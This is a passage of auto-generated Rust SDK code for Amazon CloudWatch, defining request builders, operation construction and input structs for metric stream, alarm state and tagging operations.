let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutMetricStream::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutMetricStream",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutMetricStreamInput`](crate::input::PutMetricStreamInput)
pub fn builder() -> crate::input::put_metric_stream_input::Builder {
crate::input::put_metric_stream_input::Builder::default()
}
}
/// See [`SetAlarmStateInput`](crate::input::SetAlarmStateInput)
pub mod set_alarm_state_input {
/// A builder for [`SetAlarmStateInput`](crate::input::SetAlarmStateInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_name: std::option::Option<std::string::String>,
pub(crate) state_value: std::option::Option<crate::model::StateValue>,
pub(crate) state_reason: std::option::Option<std::string::String>,
pub(crate) state_reason_data: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the alarm.</p>
pub fn alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name = Some(input.into());
self
}
pub fn set_alarm_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_name = input;
self
}
/// <p>The value of the state.</p>
pub fn state_value(mut self, input: crate::model::StateValue) -> Self {
self.state_value = Some(input);
self
}
pub fn set_state_value(
mut self,
input: std::option::Option<crate::model::StateValue>,
) -> Self {
self.state_value = input;
self
}
/// <p>The reason that this alarm is set to this specific state, in text format.</p>
pub fn state_reason(mut self, input: impl Into<std::string::String>) -> Self {
self.state_reason = Some(input.into());
self
}
pub fn set_state_reason(mut self, input: std::option::Option<std::string::String>) -> Self {
self.state_reason = input;
self
}
/// <p>The reason that this alarm is set to this specific state, in JSON format.</p>
/// <p>For SNS or EC2 alarm actions, this is just informational. But for EC2 Auto Scaling or application Auto Scaling
/// alarm actions, the Auto Scaling policy uses the information in this field to take the correct action.</p>
pub fn state_reason_data(mut self, input: impl Into<std::string::String>) -> Self {
self.state_reason_data = Some(input.into());
self
}
pub fn set_state_reason_data(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.state_reason_data = input;
self
}
/// Consumes the builder and constructs a [`SetAlarmStateInput`](crate::input::SetAlarmStateInput)
pub fn build(
self,
) -> std::result::Result<crate::input::SetAlarmStateInput, smithy_http::operation::BuildError>
{
Ok(crate::input::SetAlarmStateInput {
alarm_name: self.alarm_name,
state_value: self.state_value,
state_reason: self.state_reason,
state_reason_data: self.state_reason_data,
})
}
}
}
#[doc(hidden)]
pub type SetAlarmStateInputOperationOutputAlias = crate::operation::SetAlarmState;
#[doc(hidden)]
pub type SetAlarmStateInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl SetAlarmStateInput {
/// Consumes the builder and constructs an Operation<[`SetAlarmState`](crate::operation::SetAlarmState)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::SetAlarmState,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_set_alarm_state(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::SetAlarmState::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"SetAlarmState",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`SetAlarmStateInput`](crate::input::SetAlarmStateInput)
pub fn builder() -> crate::input::set_alarm_state_input::Builder {
crate::input::set_alarm_state_input::Builder::default()
}
}
/// See [`StartMetricStreamsInput`](crate::input::StartMetricStreamsInput)
pub mod start_metric_streams_input {
/// A builder for [`StartMetricStreamsInput`](crate::input::StartMetricStreamsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.names.unwrap_or_default();
v.push(input.into());
self.names = Some(v);
self
}
pub fn set_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.names = input;
self
}
/// Consumes the builder and constructs a [`StartMetricStreamsInput`](crate::input::StartMetricStreamsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::StartMetricStreamsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::StartMetricStreamsInput { names: self.names })
}
}
}
#[doc(hidden)]
pub type StartMetricStreamsInputOperationOutputAlias = crate::operation::StartMetricStreams;
#[doc(hidden)]
pub type StartMetricStreamsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl StartMetricStreamsInput {
/// Consumes the builder and constructs an Operation<[`StartMetricStreams`](crate::operation::StartMetricStreams)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::StartMetricStreams,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_start_metric_streams(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::StartMetricStreams::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"StartMetricStreams",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`StartMetricStreamsInput`](crate::input::StartMetricStreamsInput)
pub fn builder() -> crate::input::start_metric_streams_input::Builder {
crate::input::start_metric_streams_input::Builder::default()
}
}
/// See [`StopMetricStreamsInput`](crate::input::StopMetricStreamsInput)
pub mod stop_metric_streams_input {
/// A builder for [`StopMetricStreamsInput`](crate::input::StopMetricStreamsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.names.unwrap_or_default();
v.push(input.into());
self.names = Some(v);
self
}
pub fn set_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.names = input;
self
}
/// Consumes the builder and constructs a [`StopMetricStreamsInput`](crate::input::StopMetricStreamsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::StopMetricStreamsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::StopMetricStreamsInput { names: self.names })
}
}
}
#[doc(hidden)]
pub type StopMetricStreamsInputOperationOutputAlias = crate::operation::StopMetricStreams;
#[doc(hidden)]
pub type StopMetricStreamsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl StopMetricStreamsInput {
/// Consumes the builder and constructs an Operation<[`StopMetricStreams`](crate::operation::StopMetricStreams)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::StopMetricStreams,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_stop_metric_streams(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::StopMetricStreams::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"StopMetricStreams",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`StopMetricStreamsInput`](crate::input::StopMetricStreamsInput)
pub fn builder() -> crate::input::stop_metric_streams_input::Builder {
crate::input::stop_metric_streams_input::Builder::default()
}
}
/// See [`TagResourceInput`](crate::input::TagResourceInput)
pub mod tag_resource_input {
/// A builder for [`TagResourceInput`](crate::input::TagResourceInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) resource_arn: std::option::Option<std::string::String>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl Builder {
/// <p>The ARN of the CloudWatch resource that you're adding tags to.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.resource_arn = Some(input.into());
self
}
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.resource_arn = input;
self
}
pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// Consumes the builder and constructs a [`TagResourceInput`](crate::input::TagResourceInput)
pub fn build(
self,
) -> std::result::Result<crate::input::TagResourceInput, smithy_http::operation::BuildError>
{
Ok(crate::input::TagResourceInput {
resource_arn: self.resource_arn,
tags: self.tags,
})
}
}
}
#[doc(hidden)]
pub type TagResourceInputOperationOutputAlias = crate::operation::TagResource;
#[doc(hidden)]
pub type TagResourceInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl TagResourceInput {
/// Consumes the builder and constructs an Operation<[`TagResource`](crate::operation::TagResource)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::TagResource,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_tag_resource(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::TagResource::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"TagResource",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`TagResourceInput`](crate::input::TagResourceInput)
pub fn builder() -> crate::input::tag_resource_input::Builder {
crate::input::tag_resource_input::Builder::default()
}
}
/// See [`UntagResourceInput`](crate::input::UntagResourceInput)
pub mod untag_resource_input {
/// A builder for [`UntagResourceInput`](crate::input::UntagResourceInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) resource_arn: std::option::Option<std::string::String>,
pub(crate) tag_keys: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
/// <p>The ARN of the CloudWatch resource that you're removing tags from.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.resource_arn = Some(input.into());
self
}
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.resource_arn = input;
self
}
pub fn tag_keys(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.tag_keys.unwrap_or_default();
v.push(input.into());
self.tag_keys = Some(v);
self
}
pub fn set_tag_keys(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.tag_keys = input;
self
}
/// Consumes the builder and constructs a [`UntagResourceInput`](crate::input::UntagResourceInput)
pub fn build(
self,
) -> std::result::Result<crate::input::UntagResourceInput, smithy_http::operation::BuildError>
{
Ok(crate::input::UntagResourceInput {
resource_arn: self.resource_arn,
tag_keys: self.tag_keys,
})
}
}
}
#[doc(hidden)]
pub type UntagResourceInputOperationOutputAlias = crate::operation::UntagResource;
#[doc(hidden)]
pub type UntagResourceInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl UntagResourceInput {
/// Consumes the builder and constructs an Operation<[`UntagResource`](crate::operation::UntagResource)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::UntagResource,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_untag_resource(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::UntagResource::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"UntagResource",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`UntagResourceInput`](crate::input::UntagResourceInput)
pub fn builder() -> crate::input::untag_resource_input::Builder {
crate::input::untag_resource_input::Builder::default()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct UntagResourceInput {
/// <p>The ARN of the CloudWatch resource that you're removing tags from.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub resource_arn: std::option::Option<std::string::String>,
/// <p>The list of tag keys to remove from the resource.</p>
pub tag_keys: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for UntagResourceInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("UntagResourceInput");
formatter.field("resource_arn", &self.resource_arn);
formatter.field("tag_keys", &self.tag_keys);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TagResourceInput {
/// <p>The ARN of the CloudWatch resource that you're adding tags to.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub resource_arn: std::option::Option<std::string::String>,
/// <p>The list of key-value pairs to associate with the alarm.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl std::fmt::Debug for TagResourceInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("TagResourceInput");
formatter.field("resource_arn", &self.resource_arn);
formatter.field("tags", &self.tags);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct StopMetricStreamsInput {
/// <p>The array of the names of metric streams to stop streaming.</p>
/// <p>This is an "all or nothing" operation. If you do not have
/// permission to access all of the metric streams that you list here, then none of the streams that you list
/// in the operation will stop streaming.</p>
pub names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for StopMetricStreamsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("StopMetricStreamsInput");
formatter.field("names", &self.names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct StartMetricStreamsInput {
/// <p>The array of the names of metric streams to start streaming.</p>
/// <p>This is an "all or nothing" operation. If you do not have
/// permission to access all of the metric streams that you list here, then none of the streams that you list
/// in the operation will start streaming.</p>
pub names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for StartMetricStreamsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("StartMetricStreamsInput");
formatter.field("names", &self.names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SetAlarmStateInput {
/// <p>The name of the alarm.</p>
pub alarm_name: std::option::Option<std::string::String>,
/// <p>The value of the state.</p>
pub state_value: std::option::Option<crate::model::StateValue>,
/// <p>The reason that this alarm is set to this specific state, in text format.</p>
pub state_reason: std::option::Option<std::string::String>,
/// <p>The reason that this alarm is set to this specific state, in JSON format.</p>
/// <p>For SNS or EC2 alarm actions, this is just informational. But for EC2 Auto Scaling or application Auto Scaling
/// alarm actions, the Auto Scaling policy uses the information in this field to take the correct action.</p>
pub state_reason_data: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SetAlarmStateInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SetAlarmStateInput");
formatter.field("alarm_name", &self.alarm_name);
formatter.field("state_value", &self.state_value);
formatter.field("state_reason", &self.state_reason);
formatter.field("state_reason_data", &self.state_reason_data);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutMetricStreamInput {
/// <p>If you are creating a new metric stream, this is the name for the new stream. The name
/// must be different than the names of other metric streams in this account and Region.</p>
/// <p>If you are updating a metric stream, specify the name of that stream here.</p>
/// <p>Valid characters are A-Z, a-z, 0-9, "-" and "_".</p>
pub name: std::option::Option<std::string::String>,
/// <p>If you specify this parameter, the stream sends only the
/// metrics from the metric namespaces that you specify here.</p>
/// <p>You cannot include <code>IncludeFilters</code> and <code>ExcludeFilters</code>
/// in the same operation.</p>
pub include_filters: std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
/// <p>If you specify this parameter, the stream sends metrics from all
/// metric namespaces except for the namespaces that you specify here.</p>
/// <p>You cannot include <code>ExcludeFilters</code> and <code>IncludeFilters</code> in
/// the same operation.</p>
pub exclude_filters: std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
/// <p>The ARN of the Amazon Kinesis Firehose delivery stream to use for this metric stream.
/// This Amazon Kinesis Firehose delivery stream must already exist and must be in the same
/// account as the metric stream.</p>
pub firehose_arn: std::option::Option<std::string::String>,
/// <p>The ARN of an IAM role that this metric stream will use to access
/// Amazon Kinesis Firehose resources. This IAM role must already
/// exist and must be in the same account as the metric stream. This IAM role must include the following permissions:</p>
/// <ul>
/// <li>
/// <p>firehose:PutRecord</p>
/// </li>
/// <li>
/// <p>firehose:PutRecordBatch</p>
/// </li>
/// </ul>
pub role_arn: std::option::Option<std::string::String>,
/// <p>The output format for the stream. Valid values are <code>json</code>
/// and <code>opentelemetry0.7</code>. For more information about metric stream
/// output formats, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch-metric-streams-formats.html">
/// Metric streams output formats</a>.</p>
pub output_format: std::option::Option<crate::model::MetricStreamOutputFormat>,
/// <p>A list of key-value pairs to associate with the metric stream. You can associate as
/// many as 50 tags with a metric stream.</p>
